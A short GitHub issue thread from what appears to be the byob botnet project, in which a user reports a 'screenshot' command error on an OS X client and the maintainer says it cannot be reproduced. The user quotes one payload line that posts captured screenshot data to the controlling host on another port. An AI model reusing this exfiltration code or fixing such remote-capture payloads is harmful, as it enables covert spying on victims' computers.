### ISSUE TITLE
DEBUG:__main__:screenshot error: 'module' object has no attribute 'post'

### ISSUE THREAD

**Issue by 141801** [malwaredllc/byob#85]
client   osx 10.11.4 

run screenshot ftp  command on the server side  and get error logs from client 

        DEBUG:__main__:screenshot error: 'module' object has no attribute 'post'
 
I think the error from the payroad  line
      
           globals()['post']('http://{}:{}'.format(host, port+3), json=data)
             return 'Screenshot complete'

but don't know how to solve it

**Comment by malwaredllc** [comment]
I am unable to reproduce this error. I just tested the `screenshot` command on macOS 10.13.6 and it worked.
